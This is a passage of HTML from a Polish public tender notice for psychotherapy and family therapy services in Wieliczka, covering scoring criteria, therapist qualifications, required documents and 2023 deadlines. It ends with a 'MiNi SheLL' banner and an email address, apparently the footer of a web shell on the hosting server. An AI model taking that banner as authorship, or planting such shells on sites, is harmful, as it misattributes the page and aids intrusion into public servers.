class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>- C – cena brutto za jedną godzinę świadczenia usługi- 60%<br/>Wykonawca, który zaproponuje najniższą cenę spośród ofert spełniających wymagania, otrzyma 60 punktów, natomiast pozostali Wykonawcy – odpowiednio mniej punktów, według poniższego wzoru:<br/>C = cena minimalna / cena oferty badanej x 60<br/>- D - doświadczenie Wykonawcy – 40%<br/>Kryterium „doświadczenie Wykonawcy” rozumiane jest jako doświadczenie terapeutyczne osoby (specjalisty) wskazanej do realizacji usługi i oceniane będzie pod kątem ilości miesięcy posiadanego doświadczenia zawodowego.<br/>Punkty w tym kryterium zostaną przyznane w następujący sposób:<br/>•	12 miesięcy – 0 pkt<br/>•	13 - 24 miesięcy – 10 pkt<br/>•	25 - 36 miesięcy– 20 pkt<br/>•	37 – 48 miesięcy – 30 pkt<br/>•	49 miesięcy i powyżej– 40 pkt<br/>Minimalna ilość miesięcy posiadanego doświadczenia terapeutycznego Wykonawcy to 12 miesięcy. Oferty zawierające doświadczenie terapeutyczne Wykonawcy krótsze niż 12 miesięcy, zostaną odrzucone jako nie spełniające wymagań SWZ.<br/>Za niewskazanie w Formularzu oferty ilości miesięcy doświadczenia zawodowego osoby (specjalisty) wskazane do realizacji usługi lub wykreślenie wszystkich wskazanych okresów doświadczenia, Wykonawca nie otrzyma dodatkowych punków w tym kryterium oceny ofert. W takim przypadku Zamawiający przyjmuje, że Wykonawca zaproponował najkrótszy okres doświadczenia Wykonawcy tj. okres 12 miesięcy.<br/>Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania określone w SWZ oraz otrzyma największą liczbę punktów.<br/>Zamawiający przyjmuje, że: 1 pkt = 1% S = C + D<br/>gdzie:<br/>S – łączna ilość punktów badanej oferty<br/>C – ilość punktów badanej oferty w kryterium cena brutto z jedną godzinę świadczenia usługi<br/>D – ilość punktów badanej oferty w kryterium doświadczenie Wykonawcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej tj.: dysponują osobą/ami zdolną/ymi do należytego wykonania przedmiotu zamówienia:<br/>a)	dla części 1: co najmniej jedną osobą, z których każda posiada łącznie:<br/>•	tytuł zawodowy lekarza lub tytuł zawodowy magistra pielęgniarstwa, lub magistra po ukończeniu studiów na kierunku psychologii, pedagogiki, resocjalizacji, socjologii albo spełnione warunki określone w art. 63 ust. 1 ustawy z dnia 8 czerwca 2001 r. o zawodzie psychologa i samorządzie zawodowym psychologów (Dz. U. z 2019 r. poz. 1026),<br/>•	ukończone podyplomowe szkolenie z zakresu psychoterapii w ramach szkół psychoterapeutycznych (trwające minimum cztery lata) w nurcie analitycznym lub Gestalt lub poznawczo-behawioralnym lub psychodynamicznym psychoterapii humanistycznej lub systemowym lub zintegrowanym<br/>lub<br/>•	ukończony minimum drugi rok podyplomowego szkolenia z zakresu psychoterapii w ramach szkół psychoterapeutycznych (trwającego minimum cztery lata) lub ukończone podyplomowe szkolenie z zakresu psychoterapii w ramach szkół psychoterapeutycznych (trwające minimum cztery lata) w nurcie analitycznym lub Gestalt lub poznawczo-behawioralnym lub psychodynamicznym lub psychoterapii humanistycznej lub systemowym lub zintegrowanym, kontynuujące to szkolenie,<br/>•	minimum 12 miesięcy doświadczenia w pracy terapeutycznej oraz<br/>•	uczestniczy w regularnej superwizji własnej pracy terapeutycznej;<br/>b)	dla części 2 i 3: co najmniej jedną osobą, z których każda posiada łącznie:<br/>•	tytuł zawodowy lekarza lub tytuł zawodowy magistra pielęgniarstwa, lub magistra po ukończeniu studiów na kierunku psychologii, pedagogiki, resocjalizacji, socjologii albo spełnione warunki określone w art. 63 ust. 1 ustawy z dnia 8 czerwca 2001 r. o zawodzie psychologa i samorządzie zawodowym psychologów (Dz. U. z 2019 r. poz. 1026),<br/>•	ukończone podyplomowe szkolenie z zakresu psychoterapii w ramach szkół psychoterapeutycznych (trwające minimum cztery lata) w nurcie analitycznym lub Gestalt lub poznawczo-behawioralnym lub psychodynamicznym psychoterapii humanistycznej lub systemowym lub zintegrowanym<br/>lub<br/>•	ukończony minimum drugi rok podyplomowego szkolenia z zakresu psychoterapii w ramach szkół psychoterapeutycznych (trwającego minimum cztery lata) lub ukończone podyplomowe szkolenie z zakresu psychoterapii w ramach szkół psychoterapeutycznych (trwające minimum cztery lata) w nurcie analitycznym lub Gestalt lub poznawczo-behawioralnym lub psychodynamicznym lub psychoterapii humanistycznej lub systemowym lub zintegrowanym, kontynuujące to szkolenie,<br/>•	minimum 12 miesięcy doświadczenia w pracy terapeutycznej oraz<br/>•	uczestniczy w regularnej superwizji własnej pracy terapeutycznej i psychoterapeutycznej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu – zał. nr 10 do SWZ (wzór),</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zał. nr 6 do SWZ (wzór),<br/>2) oświadczenie na temat wykształcenia i kwalifikacji zawodowych Wykonawcy – zał. nr 7 do SWZ (wzór).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda załączenia przez Wykonawcę do oferty przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz oświadczeń i dokumentów jakie Wykonawca musi załączyć wraz z ofertą:<br/>1)	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – zał. nr 3 do SWZ (wzór),<br/>2)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu – zał. nr 4 do SWZ (wzór),<br/>3)	pełnomocnictwo do reprezentowania Wykonawcy w niniejszym zamówieniu, jeżeli wymieniona osoba/osoby nie zostały wskazane do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej,<br/>4)	pełnomocnictwo dla lidera (dotyczy podmiotów wspólnie ubiegających się o zamówienie tzw. „konsorcja oraz spółek cywilnych”),<br/>5)	oświadczenie o zakresie wykonania zamówienia przez poszczególnych Wykonawców wspólnie ubiegających się o zamówienie – zał. nr 5 do SWZ (wzór),<br/>6)	zobowiązanie podmiotu udostępniającego zasoby własne – zał. nr 8 do SWZ (wzór),<br/>7)	oświadczenie podmiotu udostępniającego zasoby własne o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu – zał. nr 9 do SWZ (wzór). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W toku prowadzonego postępowania komunikacja pomiędzy Zamawiającym a Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia następować będzie za pośrednictwem lidera (pełnomocnika), o którym mowa w pkt 1 powyżej.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, każdy z Wykonawców wraz z ofertą składa oświadczenie o niepodleganiu wykluczeniu - zał. nr 4 do SWZ (wzór).<br/>4.	Spółka cywilna, jest kwalifikowana jako Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, dlatego jej wspólnicy zobowiązani są ustanowić pełnomocnika do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo musi być załączone do oferty. Ponadto, każdy ze wspólników spółki cywilnej zobowiązany jest do złożenia wraz z ofertą oświadczenia o niepodleganiu wykluczeniu - nr 4 do SWZ (wzór).<br/>5.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegających się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>6.	W przypadku spółki cywilnej, zamówienie wykazane na spełnienie warunku dotyczącego doświadczenia Wykonawcy wykonane przez spółkę, a nie poszczególnych wspólników, Zamawiający uzna za zamówienie wykonane przez pojedynczego Wykonawcę, a nie Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (wspólnicy spółki cywilnej) składają wraz z ofertą oświadczenie o zakresie wykonania zamówienia przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia – zał. nr 5 do SWZ (wzór).<br/>8.	Zgodnie z zapisami w Części 4 pkt 1 SWZ, Zamawiający będzie żądał od Wykonawców wspólnie ubiegających się o zamówienie/wspólników spółki cywilnej, dokumentu wymienionego w Części 4 w pkt 1 ppkt 1) SWZ.<br/>9.	Wszyscy Wykonawcy składający wspólną ofertę będą ponosić odpowiedzialność solidarną za wykonanie umowy. Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy od wszystkich Wykonawców łącznie lub od każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany postanowień zawartej umowy zgodnie z przesłankami określonymi w Projektowanych<br/>Postanowieniach Umowy - załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-26 16:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-26 16:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) Pełna nazwa zadania:<br/>Świadczenie usług specjalistycznego poradnictwa w ramach Ośrodka Interwencji Kryzysowej Powiatowego Centrum Pomocy Rodzinie w Wieliczce z podziałem na 3 części: Część 1: Terapia rodzinna, Część 2: Psychoterapia indywidualna 1, Część 3: Psychoterapia indywidualna 2.<br/>2) Zamawiający oprócz wykluczenia wykonawcy w zakresie podstaw określonych w art. 108 ust. 1 od pkt 1) do pkt 6) Pzp<br/>oraz art. 109 ust. 1 pkt 4) Pzp przewiduje wykluczenie wykonawcy na podstawie art. 7 ust. 1 od pkt 1) do pkt 3) ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023 r. poz. 1497).<br/>3) Wykonawcy, jeżeli ma lub miał interes w uzyskaniu danego zamówienia oraz poniósł lub może ponieść szkodę w wyniku<br/>naruszenia przez zamawiającego przepisów Pzp przysługują środki ochrony prawnej określone w Dziale IX Pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com